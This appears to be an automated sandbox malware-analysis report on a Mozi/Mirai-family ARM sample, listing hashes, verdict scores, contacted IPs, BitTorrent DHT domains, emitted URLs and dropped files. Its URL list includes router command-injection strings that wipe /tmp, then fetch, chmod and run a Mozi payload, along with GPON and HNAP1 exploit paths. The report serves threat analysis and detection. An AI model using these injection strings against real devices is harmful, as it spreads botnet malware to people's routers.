We are hiring! Windows Kernel Developer (Remote), apply here!
flash

nT7K5GG5km

Status: finished
Submission Time: 2021-05-01 20:23:58 +02:00
Malicious
Spreader
Trojan
Evader
Mirai

Comments

Tags

Details

  • Analysis ID:
    402069
  • API (Web) ID:
    706296
  • Analysis Started:
    2021-05-01 20:23:58 +02:00
  • Analysis Finished:
    2021-05-01 20:35:23 +02:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
  • Technologies:
Full Report Management Report IOC Report Engine Info Verdict Score Reports

System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

malicious
100/100

malicious
39/60

malicious
20/37

malicious
20/29

malicious

IPs

IP Country Detection
19.35.22.33
United States
93.203.255.9
Germany
24.159.133.235
United States
Click to see the 97 hidden entries
186.64.54.15
Argentina
173.80.87.48
United States
110.86.197.212
China
83.68.127.228
France
55.204.254.198
United States
40.96.198.202
United States
12.96.110.207
United States
72.24.210.73
United States
154.138.26.112
Egypt
46.42.169.51
Russian Federation
198.198.32.42
United States
8.171.95.12
Singapore
201.181.160.44
Argentina
69.150.69.116
United States
140.43.31.90
United States
67.168.47.89
United States
36.47.114.54
China
24.144.48.190
United States
97.23.253.187
United States
149.52.60.248
United States
195.254.187.23
unknown
101.244.33.33
China
141.57.194.108
Germany
175.3.12.174
China
164.31.27.58
Germany
168.44.159.27
United States
157.98.25.110
United States
218.34.211.21
Taiwan; Republic of China (ROC)
66.148.28.100
Canada
91.102.92.141
Denmark
93.45.184.9
Italy
27.219.87.4
China
135.48.205.7
United States
106.128.236.208
Japan
5.41.198.250
Saudi Arabia
166.183.247.157
United States
215.107.106.224
United States
39.189.171.124
China
173.134.223.176
United States
58.20.74.167
China
195.76.91.176
Spain
16.158.169.248
United States
85.110.95.80
Turkey
196.224.36.136
Tunisia
197.223.37.86
Egypt
88.103.196.15
Czech Republic
207.144.55.208
United States
17.103.12.181
United States
86.130.232.94
United Kingdom
166.120.240.93
Australia
213.121.103.4
United Kingdom
72.87.194.121
United States
32.119.200.236
United States
175.165.55.236
China
185.226.106.196
Spain
29.68.34.28
United States
122.107.18.193
Australia
190.61.180.10
Colombia
191.213.118.143
Brazil
155.117.48.151
United States
75.189.26.238
United States
162.48.192.209
United States
220.49.0.51
Japan
63.112.131.88
United States
74.73.218.101
United States
218.245.32.128
China
58.33.168.139
China
59.186.255.47
Korea Republic of
134.136.214.66
United States
62.146.28.116
Germany
43.216.7.248
Japan
92.10.113.236
United Kingdom
164.176.196.33
United States
50.83.208.186
United States
168.26.94.133
United States
32.227.55.20
United States
11.3.231.145
United States
103.58.197.248
unknown
72.68.142.193
United States
172.222.196.31
United States
125.15.133.201
Japan
111.253.169.172
Taiwan; Republic of China (ROC)
59.249.34.45
China
75.36.210.166
United States
39.167.82.179
China
181.148.98.93
Colombia
35.155.184.95
United States
73.109.81.199
United States
113.138.14.215
China
99.198.164.146
United States
113.202.99.35
China
113.178.195.53
Viet Nam
100.54.104.98
United States
72.208.107.184
United States
148.200.165.122
Netherlands
98.37.89.152
United States
86.249.71.23
France

Domains

Name IP Detection
dht.transmissionbt.com
87.98.162.88
bttracker.acc.umu.se
130.239.18.159
router.bittorrent.com
67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com
82.221.103.244
bttracker.debian.org
0.0.0.0

URLs

Name Detection
http://127.0.0.1:80/GponForm/diag_Form?images/
http://179.40.62.87:80/HNAP1/
http://147.46.176.166:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
Click to see the 48 hidden entries
http://188.106.17.156:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://1.34.1.251:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://204.232.228.51:80/HNAP1/
http://81.196.113.75:80/HNAP1/
http://104.124.230.135:80/HNAP1/
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://166.88.13.234:80/HNAP1/
http://184.86.117.97:80/HNAP1/
http://45.148.37.237:80/HNAP1/
http://49.44.132.19:80/HNAP1/
http://89.129.183.215:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://185.36.171.129:80/HNAP1/
http://123.110.194.55:80/HNAP1/
http://%s:%d/bin.sh;chmod
http://13.109.201.46:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/bin.sh
http://210.190.146.92:80/HNAP1/
http://112.125.239.197:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://3.22.17.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://46.249.83.253:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://154.3.84.96:80/HNAP1/
http://www.alsa-project.org
http://%s:%d/Mozi.m;$
http://127.0.0.1sendcmd
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://ipinfo.io/ip
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://%s:%d/Mozi.a;chmod
http://www.pastebin.ca
http://purenetworks.com/HNAP1/
http://www.alsa-project.org.
http://HTTP/1.1
http://schemas.xmlsoap.org/soap/envelope//
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://schemas.xmlsoap.org/soap/envelope/
http://www.pastebin.ca/upload.php
http://%s:%d/Mozi.m
http://schemas.xmlsoap.org/soap/encoding/
http://pastebin.ca)
http://www.alsa-project.org/cardinfo-db/
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.pastebin.ca.
http://%s:%d/Mozi.a;sh$
http://114.204.63.176:49152/soap.cgi?service=WANIPConn1
http://%s:%d/Mozi.m;
http://www.alsa-project.org/alsa-info.sh

Dropped files

Name File Type Hashes Detection
/etc/init.d/mountall.sh
ASCII text
#
/usr/bin/gettext.sh
ASCII text
#
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
#
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/etc/rc.local
ASCII text
#
/etc/profile.d/vte-2.91.sh
ASCII text
#
/etc/profile.d/cedilla-portuguese.sh
ASCII text
#
/etc/profile.d/bash_completion.sh
ASCII text
#
/etc/profile.d/apps-bin-path.sh
ASCII text
#
/etc/profile.d/Z97-byobu.sh
ASCII text
#
/etc/init.d/umountnfs.sh
ASCII text
#
/etc/init.d/mountnfs.sh
ASCII text
#
/etc/init.d/mountnfs-bootclean.sh
ASCII text
#
/etc/init.d/mountkernfs.sh
ASCII text
#
/etc/init.d/mountdevsubfs.sh
ASCII text
#
/etc/init.d/mountall-bootclean.sh
ASCII text
#
/etc/init.d/hwclock.sh
ASCII text
#
/etc/init.d/hostname.sh
ASCII text
#
/etc/init.d/checkroot.sh
ASCII text
#
/etc/init.d/checkroot-bootclean.sh
ASCII text
#
/etc/init.d/checkfs.sh
ASCII text
#
/etc/init.d/bootmisc.sh
ASCII text
#
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
#
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
#
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
#
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
#
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
#
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
#
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
#
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
#
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
#
/etc/wpa_supplicant/functions.sh
ASCII text
#
/usr/share/cups/braille/indexv4.sh
ASCII text
#
/usr/share/cups/braille/indexv3.sh
ASCII text
#
/usr/share/cups/braille/index.sh
ASCII text
#
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
#
/usr/share/brltty/initramfs/brltty.sh
ASCII text
#
/usr/share/alsa/utils.sh
ASCII text
#
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
#
/tmp/.config
ASCII text
#
/etc/wpa_supplicant/ifupdown.sh
ASCII text
#
/usr/share/debconf/confmodule.sh
ASCII text
#
/etc/wpa_supplicant/action_wpa.sh
ASCII text
#
/etc/bash_completion.d/libreoffice.sh
ASCII text
#
/etc/acpi/undock.sh
ASCII text
#
/etc/acpi/tosh-wireless.sh
ASCII text
#
/etc/acpi/powerbtn.sh
ASCII text
#
/etc/acpi/ibm-wireless.sh
ASCII text
#
/etc/acpi/asus-wireless.sh
ASCII text
#
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
#
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
#
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
#
/boot/grub/i386-pc/modinfo.sh
ASCII text
#
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
#
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
#
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
#
/usr/share/doc/acpid/examples/default.sh
ASCII text
#
/usr/share/doc/acpid/examples/ac.sh
ASCII text
#